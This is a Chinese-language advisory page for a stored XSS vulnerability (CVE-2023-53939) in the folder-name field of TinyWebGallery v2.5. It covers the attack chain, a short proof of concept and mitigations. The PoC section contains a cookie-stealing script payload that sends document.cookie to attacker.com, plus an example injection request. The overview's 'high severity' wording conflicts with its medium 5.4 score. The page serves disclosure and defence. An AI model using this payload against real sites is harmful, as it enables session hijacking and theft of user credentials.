CVE-2023-53939: TinyWebGallery v2.5 存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2023-53939

漏洞类型

存储型跨站脚本(XSS)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

TinyWebGallery v2.5

漏洞概述

CVE-2023-53939是TinyWebGallery v2.5版本中发现的一个高危安全漏洞，属于存储型跨站脚本攻击（Stored XSS）。该漏洞允许经过身份认证的低权限攻击者通过编辑相册文件夹名称参数注入恶意JavaScript脚本。由于漏洞属于存储型，当其他用户访问受影响的画廊页面时，恶意脚本会自动执行，可能导致会话劫持、敏感信息窃取、钓鱼攻击等严重安全问题。攻击者利用CVSS 3.1评分体系中的网络攻击向量（AV:N），配合低权限认证要求（PR:L）和用户交互要求（UI:R），成功实现对目标系统的攻击。漏洞的机密性影响和完整性影响均为低级别（C:L/I:L），可用性影响为无（A:N），整体风险评估为中等水平。建议受影响的用户及时更新到最新版本或采取相应的安全防护措施。

技术细节

TinyWebGallery v2.5在处理相册文件夹名称时存在输入验证不足的安全缺陷。攻击者以低权限用户身份登录系统后，可以通过管理界面编辑相册文件夹名称，在名称参数中插入恶意的HTML或JavaScript代码，如<script>alert(document.cookie)</script>等。由于应用程序未对用户输入进行充分的输出编码和过滤，恶意脚本被永久存储在服务器端数据库中。当其他合法用户访问包含该文件夹的画廊页面时，服务器会直接将存储的恶意内容返回给客户端浏览器，浏览器将其作为可信内容执行，从而触发跨站脚本攻击。攻击者可以利用此漏洞窃取受害者的会话Cookie、劫持用户账号、进行钓鱼欺诈或植入进一步的攻击载荷。该漏洞的成功利用需要攻击者具备有效的低权限账号，并且需要诱导受害者访问受感染的页面，具有一定的社会工程学属性。

攻击链分析

STEP 1

步骤1

攻击者获取TinyWebGallery系统的低权限账号，完成身份认证

STEP 2

步骤2

攻击者登录管理后台，访问相册文件夹编辑功能

STEP 3

步骤3

攻击者在文件夹名称参数中注入恶意JavaScript代码，如<script>标签

STEP 4

步骤4

应用程序将恶意脚本存储到服务器数据库，未进行充分的输入验证和输出编码

STEP 5

步骤5

受害者访问包含恶意文件夹的画廊页面，服务器返回存储的恶意内容

STEP 6

步骤6

受害者浏览器执行恶意脚本，攻击者窃取Cookie或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2023-53939 Stored XSS PoC
// Target: TinyWebGallery v2.5
// Attack Vector: Album folder name parameter

// Step 1: Authenticate with low-privilege account
const loginUrl = 'http://target.com/tinywebgallery/login.php';
const credentials = {
    username: 'attacker',
    password: 'password123'
};

// Step 2: Navigate to folder management
const folderEditUrl = 'http://target.com/tinywebgallery/admin.php?action=editFolder&id=1';

// Step 3: Inject malicious XSS payload via folder name parameter
const xssPayload = '<script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>';
const maliciousFolderName = xssPayload;

// The malicious script will be stored and executed when other users view the gallery page
//受害者访问画廊页面时自动执行恶意脚本

// Example HTTP request to inject XSS:
/*
POST /tinywebgallery/admin.php?action=saveFolder HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

folder_name=<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>&folder_id=1
*/

影响范围

TinyWebGallery v2.5

防御指南

临时缓解措施

在官方补丁发布前，建议采取以下临时缓解措施：1）限制低权限用户编辑文件夹名称的功能，仅允许管理员进行此操作；2）在Web应用防火墙（WAF）层面添加XSS攻击检测规则，对包含<script>标签等可疑模式的请求进行拦截；3）启用HTTPOnly和Secure标志保护Cookie，防止JavaScript访问；4）提醒用户不要点击来源不明的链接，尤其是画廊页面链接；5）监控应用程序日志，及时发现异常请求模式。